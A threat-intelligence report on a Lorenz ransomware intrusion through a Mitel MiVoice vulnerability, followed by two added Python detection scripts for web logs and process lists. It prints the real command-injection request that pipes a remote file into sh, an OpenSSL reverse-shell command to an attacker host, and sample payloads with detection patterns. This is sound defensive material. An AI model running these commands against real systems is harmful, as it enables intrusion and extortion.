
Arctic Wolf Labs assesses with medium confidence that the Lorenz ransomware group exploited CVE-2022-29499 to compromise Mitel MiVoice Connect to gain initial access. Lorenz waited nearly a month after obtaining initial access to conduct additional activity.

The Arctic Wolf Labs team recently investigated a Lorenz ransomware intrusion, which leveraged a Mitel MiVoice VoIP appliance vulnerability (CVE-2022-29499) for initial access and Microsoft’s BitLocker Drive Encryption for data encryption. Lorenz is a ransomware group that has been active since at least February 2021 and, like many ransomware groups, performs double extortion by exfiltrating data before encrypting systems. Over the last quarter, the group has primarily targeted small and medium businesses (SMBs) located in the United States, with outliers in China and Mexico.

Monitoring just critical assets is not enough for organizations; security teams should monitor all externally facing devices for potential malicious activity, including VoIP and IoT devices. Threat actors are beginning to shift targeting to lesser-known or less-monitored assets to avoid detection. In the current landscape, many organizations heavily monitor critical assets, such as domain controllers and web servers, but tend to leave VoIP and IoT devices without proper monitoring, which enables threat actors to gain a foothold in an environment without being detected.

Initial malicious activity originated from a Mitel appliance sitting on the network perimeter. Lorenz exploited CVE-2022-29499, a remote code execution vulnerability impacting the Mitel Service Appliance component of MiVoice Connect, to obtain a reverse shell and subsequently used Chisel as a tunnelling tool to pivot into the environment.

In late June, researchers at CrowdStrike published a blog article detailing the vulnerability and a suspected ransomware intrusion attempt leveraging it for initial access. Although post-exploitation details were limited, Arctic Wolf Labs observed significant overlap in the reported Tactics, Techniques, and Procedures (TTPs) tied to initial access. The observed exploitation request was:

"GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:137.184.181[.]252/$PWD|sh|? HTTP/1.0" 200

After successful exploitation, the threat actors leveraged cURL to download a shell script called wc2_deploy:

GET //shoretel/wc2_deploy HTTP/1.1

The wc2_deploy shell script, when executed, establishes an SSL-encrypted reverse shell using living-off-the-land techniques via the mkfifo command and OpenSSL:

openssl s_client -quiet -connect 137.184.181[.]252:443 > /tmp/.svc_bkp_1

A packet capture demonstrated that the reverse shell was established to an ncat SSL listener on 137.184.181[.]252:443. Once the reverse shell was established, the threat actors made use of the Mitel device’s command line interface (stcli) to create a hidden directory and proceeded to download a compiled binary of the open source TCP tunneling tool Chisel directly from GitHub via wget.
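A detection for the exploitation request described above, added here as an example and not part of the Arctic Wolf report: it parses combined-format web access log lines, percent-decodes the request target so encoded metacharacters cannot slip past, flags /ucbsync.php syncfile calls whose argument carries shell metacharacters, and pulls out the host the argument points the appliance at. The log lines are constructed (TEST-NET addresses stand in for the real ones), and the shape of a benign syncfile argument is an assumption.

```python
"""Flag CVE-2022-29499-style requests to /ucbsync.php in web access logs.

Added example, not from the Arctic Wolf report. The log lines are
constructed to mirror the request shape described in the report; the
client and callback addresses use TEST-NET documentation ranges.
"""
import re
from urllib.parse import unquote

# Combined-format access log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3})'
)

# Shell metacharacters that have no legitimate place in a syncfile argument.
SHELL_META = re.compile(r'[|;`&$]')

# Constructed sample: one raw injection, one plausible benign call (assumed
# format), one unrelated request, and one URL-encoded injection.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Jun/2022:13:22:01 +0000] "GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:203.0.113.10/$PWD|sh|? HTTP/1.0" 200 512
198.51.100.7 - - [10/Jun/2022:13:25:44 +0000] "GET /ucbsync.php?cmd=syncfile:db_files/logo.png:10.0.0.5/share HTTP/1.1" 200 1024
198.51.100.8 - - [10/Jun/2022:13:26:02 +0000] "GET /index.php HTTP/1.1" 200 2048
203.0.113.10 - - [10/Jun/2022:13:30:15 +0000] "GET /ucbsync.php?cmd=syncfile:db_files/x:203.0.113.10/%24PWD%7Csh%7C%3F HTTP/1.0" 200 512
"""


def parse_line(line):
    """Parse one access-log line; returns None for lines that do not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # Percent-decode so URL-encoded metacharacters (%7C -> |) are still seen.
    entry["target"] = unquote(entry["target"])
    return entry


def callback_host(query):
    """Extract the remote host from cmd=syncfile:<local file>:<host>/<path>."""
    fields = query.split(":", 2)
    if len(fields) < 3:
        return None
    return fields[2].split("/", 1)[0]


def classify(entry):
    """Severity for one parsed entry: 'high', 'review' or None."""
    path, _, query = entry["target"].partition("?")
    if not path.endswith("/ucbsync.php"):
        return None
    if not query.startswith("cmd=syncfile:"):
        return "review"            # unexpected use of the endpoint
    if SHELL_META.search(query):
        return "high"              # injection shape: metacharacters in the argument
    return "review"                # any externally sourced syncfile call deserves a look


def scan(log_text):
    """Return findings, in log order, for every line that hits a rule."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        severity = classify(entry)
        if severity is None:
            continue
        _, _, query = entry["target"].partition("?")
        findings.append({
            "severity": severity,
            "client": entry["client"],
            "status": entry["status"],
            "callback_host": callback_host(query),
            "target": entry["target"],
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["client"], f["status"], f["callback_host"], f["target"])
```

The "review" tier exists because the report's point is that perimeter VoIP appliances go unwatched: a syncfile call from outside the organisation is worth a look even when it carries no obvious injection, and the extracted callback host is the value to pivot on in firewall and proxy logs.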
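For the post-exploitation chain the report describes (a named pipe plus openssl s_client used as the transport, a hidden path under /tmp, Chisel fetched from GitHub with wget and then run), here is host-side hunting logic added as an example; it is not from the report, from Mitel, or from the Chisel project. It parses `ps -eo pid,ppid,user,args` output, tags each process that matches an indicator, and walks parent PIDs to check whether the activity descends from the web server, which is what ties it back to the exploited endpoint. The process list, the addresses, and the Chisel download URL are constructed placeholders.

```python
"""Hunt a process list for the post-exploitation footprint described above.

Added example, not from the Arctic Wolf report. PROC_SAMPLE is constructed
output in the shape of `ps -eo pid,ppid,user,args`; addresses use TEST-NET
ranges and the Chisel download URL is a placeholder.
"""
import re

# Each rule: (tag, pattern over the process command line).
RULES = [
    # OpenSSL used as a transport: s_client with -quiet and -connect together.
    ("openssl_reverse_shell",
     re.compile(r"\bopenssl\s+s_client\b(?=.*\s-quiet\b)(?=.*\s-connect\s)")),
    # Named pipe created in a world-writable temp location.
    ("fifo_in_tmp", re.compile(r"\bmkfifo\s+/(?:tmp|var/tmp|dev/shm)/")),
    # Fetching a Chisel build from GitHub with a command-line downloader.
    ("chisel_download", re.compile(r"\b(?:wget|curl)\b.*github\.com/\S*chisel", re.I)),
    # Chisel running as a tunnel endpoint.
    ("chisel_tunnel", re.compile(r"(?:^|/)chisel\s+(?:client|server)\b")),
    # Dot-prefixed (hidden) file or directory under a temp location.
    ("hidden_tmp_path", re.compile(r"/(?:tmp|var/tmp|dev/shm)/\.[^\s/]+")),
]

WEB_SERVER = re.compile(r"(?:^|/)(?:apache2|httpd|nginx|php-fpm)\b")

# Constructed sample; the last two processes are benign controls.
PROC_SAMPLE = """\
  PID  PPID USER     COMMAND
    1     0 root     /sbin/init
  842     1 root     /usr/sbin/apache2 -k start
  915   842 www-data /usr/sbin/apache2 -k start
 1311   915 www-data mkfifo /tmp/.svc_bkp_1
 1312   915 www-data openssl s_client -quiet -connect 203.0.113.10:443
 1340  1312 www-data wget -q https://github.com/EXAMPLE-ORG/chisel/releases/download/vX.Y/chisel_linux_amd64.gz -O /tmp/.cache/chisel.gz
 1355  1312 www-data /tmp/.cache/chisel client 203.0.113.10:8080 R:socks
 2001     1 root     /usr/bin/openssl s_client -connect mail.example.com:465
 2050     1 root     /usr/sbin/cron
"""


def parse_ps(text):
    """Parse `ps -eo pid,ppid,user,args` output (header line skipped)."""
    procs = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, ppid, user, args = parts
        procs.append({"pid": int(pid), "ppid": int(ppid), "user": user, "args": args})
    return procs


def spawned_by_web_server(procs, pid):
    """True if any ancestor of `pid` is a web server process."""
    by_pid = {p["pid"]: p for p in procs}
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = by_pid.get(cur["ppid"])
        if cur is not None and WEB_SERVER.search(cur["args"]):
            return True
    return False


def hunt(procs):
    """Return one finding per process that matches at least one rule."""
    findings = []
    for p in procs:
        tags = [tag for tag, rx in RULES if rx.search(p["args"])]
        if not tags:
            continue
        findings.append({
            "pid": p["pid"],
            "user": p["user"],
            "tags": tags,
            # A web-server lineage ties the activity back to the exploited endpoint.
            "web_spawned": spawned_by_web_server(procs, p["pid"]),
            "args": p["args"],
        })
    return findings


if __name__ == "__main__":
    for f in hunt(parse_ps(PROC_SAMPLE)):
        lineage = "web-spawned" if f["web_spawned"] else "other"
        print(f["pid"], f["user"], ",".join(f["tags"]), lineage, f["args"])
```

An administrator's openssl s_client session without -quiet is left alone, which keeps the noise down; the lineage check is what separates a www-data child of the web server from the same command typed by an operator.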
